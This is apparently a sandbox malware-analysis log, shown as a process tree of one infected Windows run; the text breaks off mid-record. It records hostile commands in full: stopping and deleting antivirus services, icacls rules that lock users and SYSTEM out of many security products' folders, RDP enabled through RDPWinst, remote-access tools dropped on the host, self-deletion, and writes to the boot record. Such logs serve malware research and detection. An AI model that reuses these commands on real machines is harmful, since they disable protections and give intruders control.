C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
2⤵
PID:1616

C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
3⤵
PID:2172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
2⤵
PID:2640

C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
3⤵
PID:1088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
2⤵
PID:412

C:\Windows\SysWOW64\sc.exe
sc delete swprv
3⤵
PID:4068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
2⤵
PID:3208

C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
3⤵
PID:3792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
2⤵
PID:3872

C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
3⤵
PID:3416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
2⤵
PID:3364

C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
3⤵
PID:980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
2⤵
PID:2624

C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
3⤵
PID:3264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
2⤵
PID:740

C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
3⤵
PID:3592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
2⤵
PID:1500

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
3⤵
PID:3268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
2⤵
PID:3840

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
3⤵
PID:1264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
2⤵
PID:1612

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
3⤵
PID:3688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
2⤵
PID:1732

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
3⤵
PID:3384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
2⤵
PID:2384

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
3⤵
PID:2732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
2⤵
PID:508

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
2⤵
PID:2620

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
2⤵
PID:988

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
2⤵
PID:2092

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1368

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
2⤵
PID:3000

C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
2⤵
PID:4168

C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
2⤵
PID:4236

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4280

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
2⤵
PID:4292

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
2⤵
PID:4364

C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
2⤵
PID:4376

C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
2⤵
PID:4396

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
2⤵
PID:4520

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
2⤵
PID:4532

C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny Admin:(F)
3⤵
- Modifies file permissions
PID:4648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
2⤵
PID:4664

C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
3⤵
- Modifies file permissions
PID:4732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
2⤵
PID:4724

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny Admin:(F)
3⤵
- Modifies file permissions
PID:4788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
2⤵
PID:4796

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
3⤵
- Modifies file permissions
PID:4852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
2⤵
PID:4860

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
2⤵
PID:4876

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
2⤵
PID:5000

C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
2⤵
PID:5064

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
2⤵
PID:4100

C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
2⤵
PID:2024

C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
2⤵
PID:500

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
2⤵
PID:1648

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
2⤵
PID:992

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
2⤵
PID:3848

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
2⤵
PID:1188

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
2⤵
PID:3292

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4276

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
2⤵
PID:4248

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
2⤵
PID:4368

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
2⤵
PID:4440

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
2⤵
PID:4684

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
2⤵
PID:4564

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
2⤵
PID:4808

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
2⤵
PID:4892

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
2⤵
PID:4972

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
2⤵
PID:4936

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
2⤵
PID:5036

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
2⤵
PID:5076

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
2⤵
PID:1304

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
2⤵
PID:2512

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
2⤵
PID:664

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
2⤵
PID:2188

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1760

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
2⤵
PID:3008

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
2⤵
PID:4232

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
2⤵
PID:4300

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
2⤵
PID:4324

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
2⤵
PID:3524

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
2⤵
PID:4452

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
2⤵
PID:4660

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
2⤵
PID:4744

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
2⤵
PID:4884

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
2⤵
PID:4916

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
2⤵
PID:5016

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
2⤵
PID:1280

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
2⤵
PID:4120

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2352

C:\Programdata\Install\utorrent.exe
C:\Programdata\Install\utorrent.exe
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:576

C:\ProgramData\WindowsTask\azur.exe
C:\ProgramData\WindowsTask\azur.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:3548

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"
4⤵
PID:3280

C:\Windows\SysWOW64\timeout.exe
C:\Windows\system32\timeout.exe 3
5⤵
- Delays execution with timeout.exe
PID:5080

C:\ProgramData\WindowsTask\system.exe
C:\ProgramData\WindowsTask\system.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\selfDel.bat" "
4⤵
PID:960

C:\ProgramData\RDPWinst.exe
C:\ProgramData\RDPWinst.exe -u
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4216

C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall delete rule name="Remote Desktop"
4⤵
PID:5792

C:\ProgramData\RDPWinst.exe
C:\ProgramData\RDPWinst.exe -i
3⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5316

C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
4⤵
PID:5300

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2228

C:\Programdata\RealtekHD\taskhost.exe
C:\Programdata\RealtekHD\taskhost.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
PID:4244

C:\Programdata\WindowsTask\winlogon.exe
C:\Programdata\WindowsTask\winlogon.exe
2⤵
- Executes dropped EXE
PID:4656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /query /fo list
3⤵
PID:4672

C:\Windows\SysWOW64\schtasks.exe
schtasks /query /fo list
4⤵
PID:4868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
2⤵
PID:4160

C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:5636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
2⤵
PID:2716

C:\Windows\system32\gpupdate.exe
gpupdate /force
3⤵
PID:4536

C:\Users\Admin\Desktop\api.exe
"C:\Users\Admin\Desktop\api.exe"
1⤵
- Executes dropped EXE
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1620

C:\Windows\SysWOW64\LaunchWinApp.exe
"C:\Windows\system32\LaunchWinApp.exe" "https://adlice.com/thanks-downloading-diag/?utm_campaign=diag&utm_source=soft&utm_medium=btn"
2⤵
PID:5464

C:\Users\Admin\Desktop\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
"C:\Users\Admin\Desktop\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe"
1⤵
- Executes dropped EXE
PID:2304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
PID:5052

C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
intro.exe 1O5ZF
3⤵
- Executes dropped EXE
PID:5136

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:5216

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5728

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
5⤵
- Executes dropped EXE
PID:5868

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:5252

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
PID:5448

C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5720

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5948

C:\Users\Admin\AppData\Local\Temp\sib5F11.tmp\0\setup.exe
"C:\Users\Admin\AppData\Local\Temp\sib5F11.tmp\0\setup.exe" -s
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6140

C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe
"C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:5192

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
7⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:6020

C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe
C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe 0011 installp1
7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:5304

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
8⤵
- Suspicious use of SetWindowsHookEx
PID:3312

C:\Users\Admin\AppData\Roaming\1605810348493.exe
"C:\Users\Admin\AppData\Roaming\1605810348493.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605810348493.txt"
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5724

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
8⤵
- Suspicious use of SetWindowsHookEx
PID:5940

C:\Users\Admin\AppData\Roaming\1605810353930.exe
"C:\Users\Admin\AppData\Roaming\1605810353930.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605810353930.txt"
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5632

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
8⤵
- Suspicious use of SetWindowsHookEx
PID:5424

C:\Users\Admin\AppData\Roaming\1605810359509.exe
"C:\Users\Admin\AppData\Roaming\1605810359509.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605810359509.txt"
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5392

C:\Program Files\Mozilla Firefox\firefox.exe
